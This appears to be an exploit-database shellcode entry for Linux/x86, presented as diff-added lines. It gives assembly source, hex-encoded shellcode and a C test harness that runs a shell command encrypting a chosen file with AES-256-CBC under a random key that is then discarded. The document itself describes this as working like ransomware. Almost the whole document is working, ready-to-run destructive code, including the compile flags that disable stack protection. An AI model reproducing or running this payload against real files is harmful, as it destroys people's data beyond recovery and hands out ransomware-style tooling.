+# Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes)
+# Google Dork: None
+# Date: 02.05.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 185
+------------------------------[Description]---------------------------------
+
+This shellcode encrypts the specified file aith aes256cbc and a 32byte random key.
+After encryption the key is dropped.
+
+replace test.txt and .test.txt with any file.
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+  xor eax, eax
+  push eax
+  jmp short _cmd
+
+_exec:
+  pop ecx
+  mov edi, ecx
+  xor ecx, ecx
+  push eax
+  push 0x68732f6e
+  push 0x69622f2f
+  mov ebx, esp
+  push eax
+  push word 0x632d
+  mov esi, esp
+  push eax
+  push edi
+  push esi
+  push ebx
+  mov ecx, esp
+  mov al, 11
+  int 0x80
+
+_cmd:
+  call _exec
+  ;replace test.txt with any file
+  msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a
+
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x6d\x76\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x68\x65\x61\x64\x20\x2d\x63\x20\x33\x32\x20\x2f\x64\x65\x76\x2f\x75\x72\x61\x6e\x64\x6f\x6d\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x7c\x20\x6f\x70\x65\x6e\x73\x73\x6c\x20\x61\x65\x73\x2d\x32\x35\x36\x2d\x63\x62\x63\x20\x2d\x65\x20\x2d\x69\x6e\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x6f\x75\x74\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x70\x62\x6b\x64\x66\x32\x20\x2d\x6b\x20\x2d\x20\x26\x26\x20\x72\x6d\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x0a";
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }